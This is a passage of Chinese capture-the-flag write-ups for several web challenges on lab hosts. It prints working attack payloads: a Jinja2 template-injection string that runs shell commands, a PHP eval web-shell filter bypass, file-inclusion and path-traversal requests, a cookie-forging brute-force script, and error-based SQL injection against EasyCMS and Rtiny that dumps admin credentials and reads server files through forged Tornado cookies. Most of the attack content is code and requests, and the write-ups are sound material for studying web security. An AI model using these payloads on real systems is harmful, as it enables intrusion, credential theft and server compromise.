  112. 执行python脚本,并使用  system("ls") ; 查看当前目录,发现存在 fllla4aggg.php文件,该文件包含flag内容
  113. 直接查看 fllla4aggg.php,可获得flag内容
  114. system("cat fllla4aggg.php");
  115. 最终flag:
  116. ctf{a57b3698-eeae-48c0-a669-bafe3213568c}
  117. 题目名称:Hello World
  118. 题目wireup:
  119. 访问靶机网站,发现是一个显示内容为“hello wold"的内容
  120. http://106.75.72.168:9999/
  121. 查看源代码,发现有一个flag.xmas.js的 js
  122. 访问flag.xmas.js路径,发现404页面无法访问
  123. http://106.75.72.168:9999/flag.xmas.js
  124. 通过dirsearch.py对靶机网站进行目录扫描,发现有.git目录泄露
  125. python3 dirsearch.py   -u  http://106.75.72.168:9999/
  126. 通过Git_Extract工具对目标靶机网站进行/.git/目录进行下载
  127. git clone https://github.com/gakki429/Git_Extract.git
  128. python git_extract.py  http://106.75.72.168:9999/.git/
  129. 下载到本地,发现有flag.js和flagjs.04bbo9两个不同的js
  130. 用diff对flag.js和flag.js.04bb09进行对比,不同之处就是flag的关键组成字符
  131. flag{82efc37f1cd5d4636ea7cadcd5a814a2}
  132. 最终falg:
  133. flag{82efc37f1cd5d4636ea7cadcd5a814a2}
  134. 题目名称:Musee de X
  135. 题目内容:X在卢浮宫旁开了一个博物馆,欢迎社会各界人士捐献藏品
  136. 题目writeup:
  137. 打开提示我们如果要操作就需要登录
  138. 首先注册一个账号wosun
  139. http://106.75.72.168:8888/register.php
  140. 然后用这个账号登录系统
  141. http://106.75.72.168:8888/index.php
  142. 通过donate.php页面进行捐献,这里地址任意填一个url网站地址(123.com),用户名必须和注册的用户名一致(wosun)
  143. http://106.75.72.168:8888/donate.php
  144. 提交后显示了错误,jinja2模板注入
  145.  text = jinja2.Template(text).render() 说明使用了jinja2
  146. 据此信息是jinjia2模板而我们的用户名在text中,似乎就可以注入了
  147. 先注册用户名为({{前面的可以随意修改,注册成自己的用户名吧)
  148. wosun{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('cat flag*').read()}}
  149. 然后登录,捐献照片为底色为黑色的网络照片http://pic4.bbzhi.com/jingxuanbizhi/heisediannaozhuomianbizhixiazai/heisediannaozhuomianbizhixiazai_362061_5.jpg
  150. 然后go一下就看到flag了
  151. 最终flag:
  152.  flag{13460551-92a3-ed4f-844d-86f8f12ca99c}
  153. 题目名称:破译
  154. 题目wirtup:
  155. 通过ctfcrackT00LS对其字符进行凯撒解密
  156. 解密得到:
  157. BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBA88 DEVE8129E0T 50 E8E9E0TA4O, 95DD8E A0D H5GH SCH118S AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4A8 1F THE 50TE40AT510A8 C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.
  158. "ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A 810G-8AST50G 592ACT 10 THE 85VES 1F CH50ESE STUDE0TS TH41UGH A 6150T8O-DES5G0ED BAS7ETBA88 CU445CU8U9 A0D A M5DE 4A0GE 1F SCH118 BAS7ETBA88 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9E0T 9A47S A01THE4 958EST10E 50 THE 0BA'S O1UTH A0D BAS7ETBA88 DEVE8129E0T EFF14TS 50 CH50A." F8AG { GS182D9HCT9ABC5D}
  159. 其中包含了关键信息:
  160. F8AG { GS182D9HCT9ABC5D}
  161. F8AG看起来不像是flag的标识开头,这里是l被替换成8
  162. 再根据前面的字符串猜测得到:1替换O 2替换P 5替换I 8替换L 9替换M
  163. 替换掉数字后删去空格,得到:FLAG{GSOLPDMHCTMABCID}
  164. 或者脚本
  165. import requestsimport strings="\"EW S4W WFU5LWV L1 T41SVW0 1M4 2S4L0W4KZ52 E5LZ LZW 9505KL4G 1X WVMUSL510 L1 9S7W S 810Y-8SKL50Y 592SUL 10 LZW 85NWK 1X UZ50WKW KLMVW0LK LZ41MYZ S 6150L8G-VWK5Y0WV TSK7WLTS88 UM445UM8M9 S0V S E5VW 4S0YW 1X KUZ118 TSK7WLTS88 241Y4S9K,\" KS5V KZ1W9S7W4. \"LZ5K U1995L9W0L 9S47K S01LZW4 958WKL10W 50 LZW 0TS'K G1MLZ S0V TSK7WLTS88 VWNW8129W0L WXX14LK 50 UZ50S.\" X8SY { YK182V9ZUL9STU5V}"i=18temp=""for j in s: if ord(j)<=ord('M') and ord(j)>=ord('A'): if(ord(j)+i)>=ord('A') and (ord(j)+i)<=ord('Z'): temp+=chr(ord(j)+i) else: temp+=j elif ord(j)>=ord('N') and ord(j)<=ord('Z'): if (ord(j) - i) >= ord('A') and (ord(j) - i) <= ord('Z'): temp += chr(ord(j) - i) else: temp += j else: temp+=j#print tempf=tempc=""for t in f: if t=='4': c+='R' elif t=='5': c+="I" elif t == 'L': c += "T" elif t=='0': c+="N" elif t=='K': c+="S" elif t=='7': c+="K" elif t=='8': c+="L" elif t=='M': c+="U" elif t=='1': c+="O" elif t=='9': c+="M" elif t=='2': c+="P" else: c+=tprint c
  166. 得到:FLAG { GSOLPDMHCTMABCID}
  167. 根据flag格式,不能有空格,最终flag:
  168. FLAG{GSOLPDMHCTMABCID}
  169. http://217046e1bac4484fa0f719b85c8b49b8aba97d6e26ba4c5b.changame.ichunqiu.com/u/test.txt
  170. 上传成功后访问上传的文件,发现直接输出了:eval($_POST['a']) ?>
  171. http://217046e1bac4484fa0f719b85c8b49b8aba97d6e26ba4c5b.changame.ichunqiu.com/u/test.php
  172. 由此判断后台代码过滤了<?和php关键字
  173. 这里通过<script >脚本的一句户后门绕过:<script language="pHp">@eval($_POST['sb'])</script>
  174. 最终flag:
  175. flag{d09c7fbb-b68c-4229-83bb-68c4864450c1}
  176. 题目名称:Code
  177. 题目writeup:
  178. 打开url地址http://4c761be0a54f491c86c03f3ff1555b6d8645cd8e72d144ac.game.ichunqiu.com/index.php?jpg=hei.jpg,发现是一张图片
  179. 查看网页源码,发现图片经过了base64编码,将其解码,解密发现是乱码,无果
  180. index.php?jpg=中的jpg参数猜测存在任意文件包含漏洞,这里包含index.php源码读出来,并查看源代码是base64
  181. http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/index.php?jpg=index.php
  182. 得到的bae64:
  183. PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg==
  184. 对其进行解密base64,得到:
  185. <?php
  186. /**
  187.  * Created by PhpStorm.
  188.  * Date: 2015/11/16
  189.  * Time: 1:31
  190.  */
  191. header('content-type:text/html;charset=utf-8');
  192. if(! isset($_GET['jpg']))
  193.     header('Refresh:0;url=./index.php?jpg=hei.jpg');
  194. $file = $_GET['jpg'];
  195. echo '<title>file:'.$file.'</title>';
  196. $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
  197. $file = str_replace("config","_", $file);
  198. $txt = base64_encode(file_get_contents($file));
  199. echo "<img src='data:image/gif;base64,".$txt."'></img>";
  200. /*
  201.  * Can you find the flag file?
  202.  *
  203.  */
  204. ?>
  205. 发现了Created by PhpStorm,phpstorm是php代码的集成开发环境,下载phpstorm,并新建一个项目,会发现在项目文件夹里面会生成一个.idea文件,它存储了项目的配置文件,
  206. 打开.idea文件可以发现misc.xml,modules.xml,workspace.xml文件。
  207. 由于刚才解码得到的php代码是在phpstorm中创建的,因此该项目文件一定会生成一个.idea文件。
  208. 访问地址:
  209. http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/.idea/workspace.xml
  210. 打开发现xml文件中IDE生成有三个文件:x.php和config.php以及fl3g_ichuqiu.php
  211. 说明该项目生成了x.php,config.php,fl3g_ichuqiu.php文件.
  212. 分别访问
  213. x.php,config.php,fl3g_ichuqiu.php文件
  214. 其中x.php文件显示404页面不存在
  215. config.php文件显示空白
  216. http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/config.php
  217. fl3g_ichuqiu.php显示一段符号
  218. http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/fl3g_ichuqiu.php
  219. 那么flag很有可能在fl3g_ichuqiu.php中,这里通过index.php?jpg=
  220. fl3g_ichuqiu.php文件包含读取源码
  221. 查看源码:
  222. 显示:<title>file:xfl3g_ichuqiu.php</title><img src='data:image/gif;base64,'></img>
  223. 显然,base64编码内容被过滤了。
  224. 我们自己改写一下index.php的代码,在本地环境中运行一下:
  225. <?php
  226. $file = 'fl3g_ichuqiu.php';
  227. $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
  228. $file = str_replace("config","_", $file);
  229. echo $file;
  230. 输出结果为:fl3gichuqiu.php
  231. 根据上面的正则替换:preg_replace,只要不是字母数字和.,就会被替换为空,因此_被替换成""了,但是我们有办法解决,
  232. 利用index.php的substr函数即可,我们可以将fl3g_ichuqiu.php改写为fl3gconfigichuqiu.php,让后台脚本帮助我们替换。
  233. 现在包含fl3gconfigichuqiu.php读取fl3g_ichuqiu.php的源码http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php
  234. 查看源码,显示了base64编码的结果。
  235. 得到的base64编码:
  236. PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH5FX05PVElDRSk7DQppbmNsdWRlKCdjb25maWcucGhwJyk7DQpmdW5jdGlvbiByYW5kb20oJGxlbmd0aCwgJGNoYXJzID0gJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6Jykgew0KICAgICRoYXNoID0gJyc7DQogICAgJG1heCA9IHN0cmxlbigkY2hhcnMpIC0gMTsNCiAgICBmb3IoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspCXsNCiAgICAgICAgJGhhc2ggLj0gJGNoYXJzW210X3JhbmQoMCwgJG1heCldOw0KICAgIH0NCiAgICByZXR1cm4gJGhhc2g7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJHR4dCwka2V5KXsNCiAgICBmb3IoJGk9MDskaTxzdHJsZW4oJHR4dCk7JGkrKyl7DQogICAgICAgICR0bXAgLj0gY2hyKG9yZCgkdHh0WyRpXSkrMTApOw0KICAgIH0NCiAgICAkdHh0ID0gJHRtcDsNCiAgICAkcm5kPXJhbmRvbSg0KTsNCiAgICAka2V5PW1kNSgkcm5kLiRrZXkpOw0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdHRtcCAuPSAkdHh0WyRpXSBeICRrZXlbKyskc107DQogICAgfQ0KICAgIHJldHVybiBiYXNlNjRfZW5jb2RlKCRybmQuJHR0bXApOw0KfQ0KZnVuY3Rpb24gZGVjcnlwdCgkdHh0LCRrZXkpew0KICAgICR0eHQ9YmFzZTY0X2RlY29kZSgkdHh0KTsNCiAgICAkcm5kID0gc3Vic3RyKCR0eHQsMCw0KTsNCiAgICAkdHh0ID0gc3Vic3RyKCR0eHQsNCk7DQogICAgJGtleT1tZDUoJHJuZC4ka2V5KTsNCg0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdG1wIC49ICR0eHRbJGldXiRrZXlbKyskc107DQogICAgfQ0KICAgIGZvcigkaT0wOyRpPHN0cmxlbigkdG1wKTskaSsrKXsNCiAgICAgICAgJHRtcDEgLj0gY2hyKG9yZCgkdG1wWyRpXSktMTApOw0KICAgIH0NCiAgICByZXR1cm4gJHRtcDE7DQp9DQokdXNlcm5hbWUgPSBkZWNyeXB0KCRfQ09PS0lFWyd1c2VyJ10sJGtleSk7DQppZiAoJHVzZXJuYW1lID09ICdzeXN0ZW0nKXsNCiAgICBlY2hvICRmbGFnOw0KfWVsc2V7DQogICAgc2V0Y29va2llKCd1c2VyJyxlbmNyeXB0KCdndWVzdCcsJGtleSkpOw0KICAgIGVjaG8gIuKVrijila/ilr3ilbAp4pWtIjsNCn0NCj8+
  237. 将其进行解码得到一段php代码,是关于http cookie的加密与解密:<?php/** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */error_reporting(E_ALL || ~E_NOTICE);include('config.php');//获取length位数的随机字符串function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'){    $hash = '';    $max = strlen($chars) - 1;    for($i = 0; $i < $length; $i++) {        $hash .= $chars[mt_rand(0, $max)];    }    return $hash;}//加密过程,txt是明文,key是秘钥function encrypt($txt,$key){    for($i=0;$i<strlen($txt);$i++){        $tmp .= chr(ord($txt[$i])+10);    }//txt内容的ascii码增加10    $txt = $tmp;    $rnd=random(4); //4位随机字符    $key=md5($rnd.$key);//随机字符与秘钥进行拼接得到新的秘钥    $s=0;    for($i=0;$i<strlen($txt);$i++){        if($s == 32) $s = 0;        $ttmp .= $txt[$i] ^ $key[++$s]; //将明文与key按位进行异或,key的长度最长为32    }    return base64_encode($rnd.$ttmp); //将随机字符与异或后的结果进行字符串拼接,然后进行base64加密,得到密文}//解密过程,txt是密文,key是秘钥function decrypt($txt,$key){    $txt=base64_decode($txt); //将密文进行base64解码    $rnd = substr($txt,0,4); //取出解码后的密文的前四位作为随机数字符串    $txt = substr($txt,4); //从第5位开始的内容为真正的密文    $key=md5($rnd.$key); //随机字符串与秘钥进行拼接得到新的秘钥    $s=0;    for($i=0;$i<strlen($txt);$i++){        if($s == 32) $s = 0;        $tmp .= $txt[$i]^$key[++$s]; //将密文与秘钥进行异或得到tmp    }    for($i=0;$i<strlen($tmp);$i++){        $tmp1 .= chr(ord($tmp[$i])-10); //将tmp的ascii码减10得到明文    }    return $tmp1//明文}$username = decrypt($_COOKIE['user'],$key); //将HTTP Cookie方式传递的user变量作为密文,与秘钥进行解密if ($username == 'system'){   //如果解密出的结果为system,则显示flag    echo $flag;}else{    //如果解密出的结果不是system,则向客户端发送一个http cookie,cookie名称为user变量,cookie的值为guest与秘钥加密的结果,并显示一个表情    setcookie('user',encrypt('guest',$key));    echo "a??(a?ˉa??a?°)a?-";}?>获取flag的思路:要获取flag就要获取key,使得key与$_COOKIE['user']的解密结果为system。获取key的思路:通过浏览器向服务器请求“抱歉”表情界面的url,服务器就会向浏览器返回一个固定的cookie值,即:encrypt('guest',$key),则cookie值就是明文“guest”与key(5位)加密的结果(即guest与key异或得到cookie,那么guest与cookie异或可以得到key)。得到5位的key后,可以爆破第六位的key,只要用得到的5key连接上构造的第六位key,与“system”进行加密得到的user变量的cookie值去请求相应的url,通过服务器反馈的内容含有“flag”关键字符,则说明构造的第六位key值正确,从而可以得到六位的key以及flag的内容。
  238. 加密和解密的原理其实不难,需要与得到user的cookie计算解密 得到的key,然后利用这个key对system加密,从而得到system的cookie,伪造cookie得到flag.
  239. 根据代码原理,利用python脚本进行keys秘钥的爆破:# _*_ coding: utf-8 _*import requestsimport stringfrom base64 import *#返回“抱歉”表情的urlurl="http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/fl3g_ichuqiu.php"#请求该url,获取服务器返回的user变量的cookie值,即encrypt('guest',$key)cookie=requests.get(url).cookies['user']#将密文cookie进行base64解码txt=b64decode(cookie)rnd=txt[:4] #密文的前4位字符为随机字符ttmp=txt[4:]#ttmp为'guest'key进行异或的密文值,ttmp与'guest'的位数一样,为5位keys=list('xxxxxx') #六位key的初始字符串guest=list('guest')#guest明文内容system=list('system')for i in range(len(guest)): guest[i]=chr(ord(guest[i])+10)#guest明文的ascii码加10,为guest加密做准备(encrypt('guest',$key))for i in range(len(guest)): keys[i]=chr(ord(ttmp[i])^ord(guest[i]))#ttmp为'guest'key进行异或的密文值,则ttmp与guest异或为keysfor i in range(len(system)): system[i]=chr(ord(system[i])+10)#system的ascii码加10,为system加密做准备letters='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'#第六位key的爆破字符ttmp_new='' #system与keys的异或值cookie_system=[]str=''for ch in letters: keys[5]=ch for i in range(len(system)): ttmp_new +=chr(ord(system[i])^ord(keys[i])) str=rnd+ttmp_new #随机字符与异或结果进行拼接 cookie_system.append(b64encode(str)) #将拼接结果进行base64加密,得到flag界面的cookie值,并将其填充到字典cookie_system中 ttmp_new=''#爆破一次,就将ttmp_new初始化一次## print cookie_system #输出所有可能的key爆破得到的cookie值for i in cookie_system: cookies={'user':i} #cookie变量为user,值为i res=requests.get(url,cookies=cookies) #用所有的cookie值去尝试访问服务器,得到的反馈为res if 'flag' in res.content:#如果反馈的内容含有‘flag’关键字,则说明请求的cookie正确,即keys爆破成功 #print cookie_system[i] #输出正确的cookie值 print res.content #输出服务器反馈的内容,即flag
  240. 最终得到flag:
  241. flag{a543619a-eb42-489c-b6cd-700f9cbe4cb0}
  242. 题目名称:YeserCMS
  243. 题目内容:
  244. 新的CMS系统,帮忙测测是否有漏洞。tips:flag在网站根目录下的flag.php中
  245. 题目writeup:
  246. 打开链接发现其实是easycms,百度可以查到许多通用漏洞
  247. http://f6434ae33e264d1786933d22e0f05e4caae7c61df2d24aa1.changame.ichunqiu.com/
  248. 访问/celive/live/header.php,直接进行报错注入
  249. 查询数据库
  250. xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
  251. 查询表名
  252. xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
  253. 这里出现了一个尴尬的问题,显示的长度不够了,通过调整1,32的来调整可显示部分表出来
  254. 得到部分表名:yesercms_a_attachment和yesercms_
  255. 因为group_concat只取数据的32位,所以我们用python脚本跑一下,得到完整的数据库表:
  256. import requestsurl = 'http://f6434ae33e264d1786933d22e0f05e4caae7c61df2d24aa1.changame.ichunqiu.com/celive/live/header.php'for i in range(1, 999, 31): postdata = { 'xajax': 'Postdata', 'xajaxargs[0]': "<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),%s,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>" % str( i) } r = requests.post(url, data=postdata) print r.content[22:53]
  257. 得到完整的表:
  258. yesercms_a_attachment,yesercms_a_comment,yesercms_a_rank,yesercms_a_vote,yesercms_activity,yesercms_announcement,yesercms_archive,yesercms_assigns,yesercms_b_arctag,yesercms_b_area,yesercms_b_category,yesercms_b_special,yesercms_b_tag,yesercms_ballot,yesercms_bbs_archive,yesercms_bbs_category,yesercms_bbs_label,yeercms_bbs_reply,yesercms_chat,yesercms_departments,yesercms_detail,yesercms_event,yesercms_friendlink,yesercms_guestbook,yesercms_linkword,yesercms_my_a,yesercms_my_yingpin,yesercms_operators,yesercms_option,yesercms_p_orders,yesercms_p_pay,yesercms_p_shipping,yesercms_pay_exchange,yesercms_sessions,yesercms_settings,yesercms_templatetag,yesercms_type,yesercms_union,yesercms_union_pay,yesercms_union_visit,yesercms_user,yesercms_usergroup
  259. 查询字段:
  260. xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
  261. 得到字段名:userid,username,password,nickna
  262. 爆出字段内容:
  263. xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx', (UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
  264. 获得admin的用户MD5值为:ff512d4240cbbdeafada40467
  265. 这里md5的长度也不够32位,还是需要调整,将起始位1修改为8
  266. xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx', (UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),8,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
  267. 或者
  268. xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,substring((SELECT/**/GROUP_CONCAT(username,password) from yesercms_user),10,50),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
  269. 拿到账号密码admin|ff512d4240cbbdeafada404677ccbe61,解密后得到明文:Yeser231
  270. 登陆成功后,在“管理-模板-当模板编辑”中存在文件读取漏洞
  271. 打开burpsuit,点击某一个档案的编辑按钮然后进行抓包
  272. 修改id的值,题目提示说flag在flag.php中,因为不知道在几级目录下,依次尝试 
  273. flag.php
  274. ../flag.php
  275. ../../flag.php
  276. 最后成功得到flag
  277. POST /index.php?case=template&act=fetch&admin_dir=admin&site=defaul
  278. data:
  279. &id=../../flag.php
  280. 最终flag:
  281. flag{2d5d0894-8acc-44ce-b48a-280fb3fae9ab}
  282. 题目名称:XSS平台
  283. 题目writeup:
  284. 启动题目场景,获得靶场网站,发现是一个xss平台
  285. 输入用户名和密码,通过bupsuit抓包拦截发送请求,并测试sql注入无果
  286. 这里将post数据包中的pass这个参数后加入其它字符如[],发送请求,发现在响应页面报错,并且显示为Rtiny python项目,且爆出网站的物理路径为:
  287. /var/www/html
  288. 在github中搜索Rtiny,找到项目地址:
  289. https://github.com/r0ker/Rtiny-xss
  290. 下载项目源码到本地,对其python 项目进行审计,发现lock.py文件中的代码是存在注入的,因为username和password参数都没有做过滤处理。
  291. Username是来自cookie的加密发送,Tornado的set_secure_cookie()函数发送浏览器的cookies,以防范浏览器中的恶意修改。
  292. 而这个cookie是被加密过的,加密使用的keyindex.php文件中。cookie_secret的值为:M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=
  293. 所以我们只需要将自己的注入语句,使用相同的s
  294. ookie_secret值进行加密即可,并
  295. 使用报错注入构造注入语句,脚本如下:
  296. import tornado.ioloop
  297. import tornado.web
  298.  
  299. settings = {
  300.    "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=",
  301. }
  302. class MainHandler(tornado.web.RequestHandler):
  303.     def get(self):
  304.         self.write("Hello")
  305.         self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ")
  306.         #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ")
  307.         #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ")
  308.         #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),30,62))) -- ")
  309.         #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#")
  310.         #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),28,60)))#")
  311.         self.write(self.get_secure_cookie("username"))
  312. def make_app():
  313.     return tornado.web.Application([
  314.         (r"/index", MainHandler),
  315.         ], **settings)
  316. if __name__ == "__main__":
  317.     app = make_app()
  318.     app.listen(8080)
  319.     tornado.ioloop.IOLoop.instance().start()
  320. 脚本运行之后,
  321. 使用火狐浏览器访问
  322. http://192.168.1.8:8080/index,并获取
  323. Set-Cookie值。
  324. 下面为各个
  325. self.set_secure_cookie都执行一次,获得响应的Set-Cookie值
  326. 然后访问lock路径,且替换cookie信息(不同报错SQL注入语句生成的cookie),可获得不同的信息。
  327. 获得数据库版本:
  328. self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- "):
  329. Set-Cookie: username=2|1:0|10:1628698313|8:username|76:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCB2ZXJzaW9uKCkpKSkgLS0g|294ff6fda043eb8041e3ba94fe4677a85c6a5d9e4aeebb3790deccbe7d0e4009; expires=Fri, 10 Sep 2021 16:11:53 GMT; Path=/
  330. 数据库版本为:5.5.50
  331. 获得表名:
  332. self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- "):
  333. Set-Cookie: username=2|1:0|10:1628698669|8:username|188:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSkpLS0g|fcf80f56b27a4c2c80ad3c569594a4823d2a510bfb29dd44262764c06a8589b0; expires=Fri, 10 Sep 2021 16:17:49 GMT; Path=/
  334. 得到4个表:
  335. host,manager,module,msglog,pro
  336. 获得字段名:
  337. self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ")
  338. Set-Cookie: username=2|1:0|10:1628698796|8:username|224:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWU9J21hbmFnZXInKSkpLS0g|049171c133846ce5524c3287cd499263ae26dc4588dab1b12fdb48467286e322; expires=Fri, 10 Sep 2021 16:19:56 GMT; Path=/
  339. 得到3个字段名:
  340. username,password,email
  341. 获得字段数据内容:
  342. self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),30,62))) -- ")
  343. Set-Cookie: username=2|1:0|10:1628698884|8:username|156:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsbWlkKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCd8JyxwYXNzd29yZCwnfCcsZW1haWwpIGZyb20gbWFuYWdlciksMzAsNjIpKSkgLS0g|d28589cae4f851cc8e55bee6e03ec08e76f96d4f839a1a4a35867e2af78b6c83; expires=Fri, 10 Sep 2021 16:21:24 GMT; Path=/
  344. 得到后半部分的MD5值:cfc4337207f|545
  345. self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),1,30))) -- ")
